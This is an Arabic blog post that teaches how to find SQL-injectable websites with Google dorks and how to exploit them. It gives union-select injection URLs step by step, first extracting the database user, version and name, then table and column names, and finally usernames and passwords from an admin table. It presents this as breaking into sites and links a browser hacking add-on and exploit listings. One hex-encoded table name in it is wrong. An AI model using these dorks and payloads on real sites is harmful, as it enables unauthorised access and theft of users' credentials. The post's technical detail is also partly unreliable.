كيف البحث عن ثغرات SQL

مشاهدات الان

ما ادري من صنه هذا : امر بحث Dork

المهم نعطيكم المفيد البحث عن الملفات للحقنه SQL
Web SQL Dork اكتب هذا بمواقع البحث
قوقل ما عاد ينفع ! نعطيكم مثال هذا موقع الكثير من الخدمات وليس بحث
https://gbhackers.com/latest-google-sql-dorks/
شكل البحث مثال فقط
inurl:product.php?mid=
inurl:view_ad.php?id=
inurl:/imprimir.php?id=
inurl:/prodotti.php?id=
ونطبق المثل في الاختراق لسكربت معين مثلا WordPress
http://www.WordPress/product.php?Id=13
بس تجد خطي نفس الصوره كمثال يعني مصاب
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhazJqf1mpTWPcw0RuMecC0NsTICx288XOI35QYDhDeTLy1tDpjPXKhCaubxZP8LFxpf8UMo0k1dXj3uPRShgzPvr9BklYtagWnws7u8S6kZaZY0lJUt81pFpSuhE4OxnNZAK4aJpRUQ6o5/s1600/field-journal.gif
اوامر نجربها
user() إظهار المستعمل
http://www.WordPress/product.php?Id=-13 union all select 1,user(),3--
version() إصدار قاعدة البيانات
http://www.WordPress/product.php?Id=-13 union all select 1,version(),3--
database() إسم قاعدة البيانات
http://www.WordPress/product.php?Id=-13 union all select 1,database(),3--
استخراج أسماء الجداول tables
الان سنقوم باستخراج مجموع الجداول والبحث عن الأهم و هو غالبا الذي يحمل الأدمين وبياناته الشخصية :
http://www.WordPress/product.php?Id=-13 union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--
استخراج اعمدة الجدول
بعد أن قمنا بتحديد الجدول يجب أن نقوم بتحويله إلى صيغة Hex فمثلا poll_user سيصبح 0x706f6c6c5f00000572
http://www.WordPress/product.php?Id=-13 union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x706f6c6c5f00000572 --
استخراج المعلومات
أخيرا نأتي لاستخراج المعلومات وسنقوم بالفصل بين Id و الباسوورد و user ب 0x3a قيمة : بالهيكس
http://www.WordPress/product.php?Id=-13 union all select 1,concat(user_id,0x3a,username,0x3a,userpass),3 from poll_user--
هنا نقدر نقول لك مبروك الاختراق لان عند الخطئ يطلع لك اليوزر نيم يعني الاسم
واذا الكود تشفر لفك : اعلم انك تقدر الدخول للموقع بكل سهوله
واقرب واسهل برنامج اضافه لـ الثعلب اتبع
https://hkrkoz9.blogspot.com/2020/11/hackbar.html
وهذي مواقع الثغرات
https://cxsecurity.com/dorks/
https://nwpc-ch.org/index.php/fr/exploits
وسلامتكم

إرسال تعليق

أحدث أقدم